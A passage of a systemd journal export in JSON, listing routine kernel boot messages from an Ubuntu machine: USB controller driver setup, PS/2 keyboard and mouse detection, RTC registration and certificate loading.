"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1023545", "MESSAGE" : "ehci-pci: EHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16a;b=e2b08827b5804427b422c10c84f1567e;m=56ab43;t=5bd16dd1a2aaa;x=1ef9ebda111f1d22", "__REALTIME_TIMESTAMP" : "1615280779963050", "__MONOTONIC_TIMESTAMP" : "5679939", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1025829", "MESSAGE" : "ehci-platform: EHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16b;b=e2b08827b5804427b422c10c84f1567e;m=56ab51;t=5bd16dd1a2ab8;x=3dfe6dbf3b16578f", "__REALTIME_TIMESTAMP" : "1615280779963064", "__MONOTONIC_TIMESTAMP" : "5679953", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1028441", "MESSAGE" : "ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16c;b=e2b08827b5804427b422c10c84f1567e;m=56ab5b;t=5bd16dd1a2ac3;x=5c45b4e56c4e32d3", "__REALTIME_TIMESTAMP" : "1615280779963075", "__MONOTONIC_TIMESTAMP" : "5679963", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1031526", "MESSAGE" : "ohci-pci: OHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16d;b=e2b08827b5804427b422c10c84f1567e;m=56ab66;t=5bd16dd1a2acd;x=c6af84ea0edcf2a4", "__REALTIME_TIMESTAMP" : "1615280779963085", "__MONOTONIC_TIMESTAMP" : "5679974", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1033861", "MESSAGE" : "ohci-platform: OHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16e;b=e2b08827b5804427b422c10c84f1567e;m=56ab71;t=5bd16dd1a2ad8;x=27122ae32a945e34", "__REALTIME_TIMESTAMP" : "1615280779963096", "__MONOTONIC_TIMESTAMP" : "5679985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1036472", "MESSAGE" : "uhci_hcd: USB Universal Host Controller Interface driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16f;b=e2b08827b5804427b422c10c84f1567e;m=56ac12;t=5bd16dd1a2b79;x=6e5c6dcfc49b8307", "__REALTIME_TIMESTAMP" : "1615280779963257", "__MONOTONIC_TIMESTAMP" : "5680146", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1065982", "MESSAGE" : "uhci_hcd 0000:00:01.2: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=170;b=e2b08827b5804427b422c10c84f1567e;m=56aca9;t=5bd16dd1a2c11;x=6cc042b6b48f343f", "__REALTIME_TIMESTAMP" : "1615280779963409", "__MONOTONIC_TIMESTAMP" : "5680297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1068810", "MESSAGE" : "uhci_hcd 0000:00:01.2: new USB bus registered, assigned bus number 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=171;b=e2b08827b5804427b422c10c84f1567e;m=56ad2b;t=5bd16dd1a2c93;x=4773aee5aabdab80", "__REALTIME_TIMESTAMP" : "1615280779963539", "__MONOTONIC_TIMESTAMP" : "5680427", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1072774", "MESSAGE" : "uhci_hcd 0000:00:01.2: detected 2 ports" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=172;b=e2b08827b5804427b422c10c84f1567e;m=56d595;t=5bd16dd1a54fc;x=251c545145a04c84", "__REALTIME_TIMESTAMP" : "1615280779973884", "__MONOTONIC_TIMESTAMP" : "5690773", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1075535", "MESSAGE" : "uhci_hcd 0000:00:01.2: irq 11, io base 0x0000c080" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=173;b=e2b08827b5804427b422c10c84f1567e;m=56d6aa;t=5bd16dd1a5612;x=9be4e9f717037fc4", "__REALTIME_TIMESTAMP" : "1615280779974162", "__MONOTONIC_TIMESTAMP" : "5691050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1078685", "MESSAGE" : "usb usb1: New USB device found, idVendor=1d6b, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=174;b=e2b08827b5804427b422c10c84f1567e;m=56d753;t=5bd16dd1a56ba;x=edb68a51b32d1f48", "__REALTIME_TIMESTAMP" : "1615280779974330", "__MONOTONIC_TIMESTAMP" : "5691219", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1082159", "MESSAGE" : "usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=175;b=e2b08827b5804427b422c10c84f1567e;m=56d7f3;t=5bd16dd1a575a;x=4551231a8f22525c", "__REALTIME_TIMESTAMP" : "1615280779974490", "__MONOTONIC_TIMESTAMP" : "5691379", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1085960", "MESSAGE" : "usb usb1: Product: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=176;b=e2b08827b5804427b422c10c84f1567e;m=571306;t=5bd16dd1a926d;x=87ece26f0c49ecc4", "__REALTIME_TIMESTAMP" : "1615280779989613", "__MONOTONIC_TIMESTAMP" : "5706502", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1088517", "MESSAGE" : "usb usb1: Manufacturer: Linux 4.15.0-60-generic uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=177;b=e2b08827b5804427b422c10c84f1567e;m=571413;t=5bd16dd1a937b;x=322d5212720146ca", "__REALTIME_TIMESTAMP" : "1615280779989883", "__MONOTONIC_TIMESTAMP" : "5706771", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1091807", "MESSAGE" : "usb usb1: SerialNumber: 0000:00:01.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=178;b=e2b08827b5804427b422c10c84f1567e;m=572760;t=5bd16dd1aa6c7;x=e9bd32cc57333af6", "__REALTIME_TIMESTAMP" : "1615280779994823", "__MONOTONIC_TIMESTAMP" : "5711712", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1094287", "MESSAGE" : "hub 1-0:1.0: USB hub found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=179;b=e2b08827b5804427b422c10c84f1567e;m=572807;t=5bd16dd1aa76e;x=1424ea86ec6e89e1", "__REALTIME_TIMESTAMP" : "1615280779994990", "__MONOTONIC_TIMESTAMP" : "5711879", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1096296", "MESSAGE" : "hub 1-0:1.0: 2 ports detected" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17a;b=e2b08827b5804427b422c10c84f1567e;m=572818;t=5bd16dd1aa77f;x=487a777dc803ce69", "__REALTIME_TIMESTAMP" : "1615280779995007", "__MONOTONIC_TIMESTAMP" : "5711896", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1098684", "MESSAGE" : "i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17b;b=e2b08827b5804427b422c10c84f1567e;m=572824;t=5bd16dd1aa78b;x=c885aa5c0b1f5851", "__REALTIME_TIMESTAMP" : "1615280779995019", "__MONOTONIC_TIMESTAMP" : "5711908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1103996", "MESSAGE" : "serio: i8042 KBD port at 0x60,0x64 irq 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17c;b=e2b08827b5804427b422c10c84f1567e;m=57282f;t=5bd16dd1aa796;x=1ac2ff77ced2737", "__REALTIME_TIMESTAMP" : "1615280779995030", "__MONOTONIC_TIMESTAMP" : "5711919", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1106696", "MESSAGE" : "serio: i8042 AUX port at 0x60,0x64 irq 12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17d;b=e2b08827b5804427b422c10c84f1567e;m=572839;t=5bd16dd1aa7a1;x=1843acc11db0ccff", "__REALTIME_TIMESTAMP" : "1615280779995041", "__MONOTONIC_TIMESTAMP" : "5711929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1109449", "MESSAGE" : "mousedev: PS/2 mouse device common for all mice" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17e;b=e2b08827b5804427b422c10c84f1567e;m=572844;t=5bd16dd1aa7ac;x=50d9fe56fe48eab5", "__REALTIME_TIMESTAMP" : "1615280779995052", "__MONOTONIC_TIMESTAMP" : "5711940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1112923", "MESSAGE" : "input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17f;b=e2b08827b5804427b422c10c84f1567e;m=573263;t=5bd16dd1ab1cb;x=68a985843a955b82", "__REALTIME_TIMESTAMP" : "1615280779997643", "__MONOTONIC_TIMESTAMP" : "5714531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1117456", "MESSAGE" : "rtc_cmos 00:00: RTC can wake from S4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=180;b=e2b08827b5804427b422c10c84f1567e;m=573302;t=5bd16dd1ab26a;x=c6cc0e35801d1ce9", "__REALTIME_TIMESTAMP" : "1615280779997802", "__MONOTONIC_TIMESTAMP" : "5714690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1120562", "MESSAGE" : "rtc_cmos 00:00: rtc core: registered rtc_cmos as rtc0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=181;b=e2b08827b5804427b422c10c84f1567e;m=573384;t=5bd16dd1ab2eb;x=c4d65f02f5e85074", "__REALTIME_TIMESTAMP" : "1615280779997931", "__MONOTONIC_TIMESTAMP" : "5714820", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1123947", "MESSAGE" : "rtc_cmos 00:00: alarms up to one day, y3k, 114 bytes nvram" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=182;b=e2b08827b5804427b422c10c84f1567e;m=573392;t=5bd16dd1ab2fa;x=2e98378bbae74b79", "__REALTIME_TIMESTAMP" : "1615280779997946", "__MONOTONIC_TIMESTAMP" : "5714834", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1127232", "MESSAGE" : "i2c /dev entries driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=183;b=e2b08827b5804427b422c10c84f1567e;m=57339e;t=5bd16dd1ab306;x=b16628e86e165900", "__REALTIME_TIMESTAMP" : "1615280779997958", "__MONOTONIC_TIMESTAMP" : "5714846", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1129173", "MESSAGE" : "device-mapper: uevent: version 1.0.3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=184;b=e2b08827b5804427b422c10c84f1567e;m=5733aa;t=5bd16dd1ab312;x=58fad9fec424c6a4", "__REALTIME_TIMESTAMP" : "1615280779997970", "__MONOTONIC_TIMESTAMP" : "5714858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1131565", "MESSAGE" : "device-mapper: ioctl: 4.37.0-ioctl (2017-09-20) initialised: dm-devel@redhat.com" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=185;b=e2b08827b5804427b422c10c84f1567e;m=5733b5;t=5bd16dd1ab31d;x=c07c443d3e16db99", "__REALTIME_TIMESTAMP" : "1615280779997981", "__MONOTONIC_TIMESTAMP" : "5714869", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1135720", "MESSAGE" : "ledtrig-cpu: registered to indicate activity on CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=186;b=e2b08827b5804427b422c10c84f1567e;m=5733c0;t=5bd16dd1ab328;x=6a7777c70ce3a255", "__REALTIME_TIMESTAMP" : "1615280779997992", "__MONOTONIC_TIMESTAMP" : "5714880", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1138945", "MESSAGE" : "NET: Registered protocol family 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=187;b=e2b08827b5804427b422c10c84f1567e;m=5733cb;t=5bd16dd1ab333;x=4be3aaf7e9240aee", "__REALTIME_TIMESTAMP" : "1615280779998003", "__MONOTONIC_TIMESTAMP" : "5714891", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1145234", "MESSAGE" : "Segment Routing with IPv6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=188;b=e2b08827b5804427b422c10c84f1567e;m=5733d6;t=5bd16dd1ab33e;x=4640c378a5cdf6da", "__REALTIME_TIMESTAMP" : "1615280779998014", "__MONOTONIC_TIMESTAMP" : "5714902", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1147095", "MESSAGE" : "NET: Registered protocol family 17" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=189;b=e2b08827b5804427b422c10c84f1567e;m=5733e1;t=5bd16dd1ab349;x=767dc5bae120251e", "__REALTIME_TIMESTAMP" : "1615280779998025", "__MONOTONIC_TIMESTAMP" : "5714913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1149474", "MESSAGE" : "Key type dns_resolver registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18a;b=e2b08827b5804427b422c10c84f1567e;m=5733f1;t=5bd16dd1ab358;x=dc645808a879f3b", "__REALTIME_TIMESTAMP" : "1615280779998040", "__MONOTONIC_TIMESTAMP" : "5714929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1152099", "MESSAGE" : "mce: Using 10 MCE banks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18b;b=e2b08827b5804427b422c10c84f1567e;m=5733fc;t=5bd16dd1ab364;x=548f413767b00380", "__REALTIME_TIMESTAMP" : "1615280779998052", "__MONOTONIC_TIMESTAMP" : "5714940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1154159", "MESSAGE" : "RAS: Correctable Errors collector initialized." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18c;b=e2b08827b5804427b422c10c84f1567e;m=573407;t=5bd16dd1ab36f;x=373f9d3379613ea0", "__REALTIME_TIMESTAMP" : "1615280779998063", "__MONOTONIC_TIMESTAMP" : "5714951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1157286", "MESSAGE" : "sched_clock: Marking stable (1157251439, 0)->(1571788225, -414536786)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18d;b=e2b08827b5804427b422c10c84f1567e;m=573412;t=5bd16dd1ab37a;x=8c48752968bc386e", "__REALTIME_TIMESTAMP" : "1615280779998074", "__MONOTONIC_TIMESTAMP" : "5714962", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1161722", "MESSAGE" : "registered taskstats version 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18e;b=e2b08827b5804427b422c10c84f1567e;m=57341d;t=5bd16dd1ab385;x=20a0aa6d8fdeab14", "__REALTIME_TIMESTAMP" : "1615280779998085", "__MONOTONIC_TIMESTAMP" : "5714973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "1163542", "MESSAGE" : "Loading compiled-in X.509 certificates" } { "__CURSOR" : 